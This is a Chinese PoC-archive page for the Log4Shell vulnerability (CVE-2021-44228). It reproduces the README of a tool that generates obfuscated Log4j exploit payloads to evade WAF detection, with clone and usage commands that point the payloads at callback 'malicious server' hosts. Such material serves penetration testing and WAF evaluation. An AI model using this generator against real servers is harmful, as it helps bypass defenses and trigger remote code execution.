POC详情: 3445532377507d993acea96e60a6ee533a1d767c

来源
关联漏洞
标题: Apache Log4j 代码问题漏洞 (CVE-2021-44228)
描述:Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞,攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器,当该请求被打印成日志时就会触发远程代码执行。
描述
Generate primary obfuscated or secondary obfuscated CVE-2021-44228 or CVE-2021-45046 payloads to evade WAF detection.
介绍
# Log4Shell-obfuscated-payloads-generator
Log4Shell-obfuscated-payloads-generator can generate primary obfuscated or secondary obfuscated CVE-2021-44228 or CVE-2021-45046 payloads to evade WAF detection.

[The design idea of ​​Log4Shell-obfuscated-payloads-generator](https://r3kind1e.github.io/2022/05/26/Log4Shell-obfuscated-payloads-generator/)

## Installation
```
git clone https://github.com/r3kind1e/Log4Shell-obfuscated-payloads-generator.git
```

Log4Shell-obfuscated-payloads-generator works out of the box with Python version 3.x on any platform.

## Usage
To get a list of basic options use:

```
python3 Log4Shell-obfuscated-payloads-generator.py -h
```

To get usage examples use:

```
python3 Log4Shell-obfuscated-payloads-generator.py -hh
```

## Screenshots
`-h`: get a list of basic options
![help](img/help.png)

`-hh`: get usage examples
![usage-examples](img/usage-examples.png)

With a single option to generate payloads, the `-s` option specifies the malicious server:
```
--generate-primary-obfuscated-cve-2021-44228-payload 8 -s ck0pf4l6fmq4w0v17o7t894txk3arz.oastify.com
```
![primary44228](img/primary44228.png)
![burp-collaborator-client1](img/burp-collaborator-client1.png)

```
--generate-primary-obfuscated-cve-2021-45046-payload 4 -s x53a0p6r07bphlgms9setupei5owcl.oastify.com
```
![primary45046](img/primary45046.png)

```
--generate-secondary-obfuscated-cve-2021-44228-payload 5 -s oia1rpap41mhxkp6rdbbywit1k7avz.oastify.com
```
![secondary44228](img/secondary44228.png)
![burp-collaborator-client2](img/burp-collaborator-client2.png)

```
--generate-secondary-obfuscated-cve-2021-45046-payload 5 -s 3vzg44n4hgzwaz2l4soqbbv8ezkq8f.oastify.com
```
![secondary45046](img/secondary45046.png)

With multiple options to generate payloads, the `-s` option specifies a malicious server:
```
--generate-primary-obfuscated-cve-2021-44228-payload 4 --generate-secondary-obfuscated-cve-2021-44228-payload 4 -s exfr6fpfjr17ca4w63q1dmxjgam2ar.oastify.com
```
![primary44228secondary44228](img/primary44228secondary44228.png)

Without specifying a malicious server with the `-s` option, the `{{callback_host}}` placeholder will be preserved in the generated payloads:
```
--generate-primary-obfuscated-cve-2021-44228-payload 3
```
![primary44228-without-server](img/primary44228-without-server.png)
```
--generate-primary-obfuscated-cve-2021-45046-payload 3 --generate-secondary-obfuscated-cve-2021-45046-payload 7
```
![primary45046secondary45046](img/primary45046secondary45046.png)
文件快照

[4.0K] /data/pocs/3445532377507d993acea96e60a6ee533a1d767c ├── [4.0K] img │   ├── [169K] burp collaborator client1.png │   ├── [169K] burp-collaborator-client1.png │   ├── [200K] burp collaborator client2.png │   ├── [200K] burp-collaborator-client2.png │   ├── [186K] help.png │   ├── [358K] primary44228.png │   ├── [311K] primary44228secondary44228.png │   ├── [158K] primary44228-without-server.png │   ├── [284K] primary45046.png │   ├── [314K] primary45046secondary45046.png │   ├── [409K] secondary44228.png │   ├── [325K] secondary45046.png │   └── [175K] usage-examples.png ├── [1.0K] LICENSE ├── [ 27K] Log4Shell-obfuscated-payloads-generator.py ├── [4.0K] payloads_template │   ├── [ 577] cve_2021_44228_payloads_template.txt │   └── [ 347] cve_2021_45046_payloads_template.txt ├── [4.0K] primary_obfuscated_template │   ├── [ 554] delimiter_obfuscated.txt │   ├── [ 798] lower_case_obfuscated.txt │   └── [ 798] upper_case_obfuscated.txt ├── [2.4K] README-CN.md ├── [2.5K] README.md ├── [ 16] requirements.txt └── [4.0K] secondary_obfuscated_template ├── [1.3K] delimiter_obfuscated.txt ├── [ 278] lookup_prefix_char_obfuscated.txt ├── [1.5K] lower_case_obfuscated.txt └── [1.5K] upper_case_obfuscated.txt 4 directories, 27 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。